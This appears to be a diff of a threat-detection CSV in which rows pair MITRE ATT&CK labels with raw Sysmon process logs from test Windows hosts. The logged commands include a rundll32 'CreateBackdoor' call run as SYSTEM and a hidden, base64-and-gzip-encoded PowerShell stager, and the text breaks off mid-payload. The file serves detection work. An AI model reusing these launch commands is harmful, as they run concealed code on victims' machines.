+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.459240Z"">
+    </TimeCreated>
+    <EventRecordID>243558</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.452</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001035972000</Data>
+    <Data Name=""ProcessId"">1388</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
+    </TimeCreated>
+    <EventRecordID>336</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
+    <Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
+    <Data Name=""ProcessId"">4180</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
+    <Data Name=""LogonId"">0x7a3aff</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
+    <Data Name=""ParentProcessId"">1628</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
+    </TimeCreated>
+    <EventRecordID>336</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
+    <Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
+    <Data Name=""ProcessId"">4180</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
+    <Data Name=""LogonId"">0x7a3aff</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
+    <Data Name=""ParentProcessId"">1628</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.459240Z"">
+    </TimeCreated>
+    <EventRecordID>243558</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.452</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001035972000</Data>
+    <Data Name=""ProcessId"">1388</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden , -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line (&quot;powershell.exe&quot; -noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell.exe  -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:26:52.356089Z"">
+    </TimeCreated>
+    <EventRecordID>9809</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:26:52.356</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AF8C-5CC8-0000-001003361900</Data>
+    <Data Name=""ProcessId"">2484</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;powershell.exe&quot; -noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-AF8B-5CC8-0000-0010AC1B1900</Data>
+    <Data Name=""ParentProcessId"">3872</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell.exe  -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+c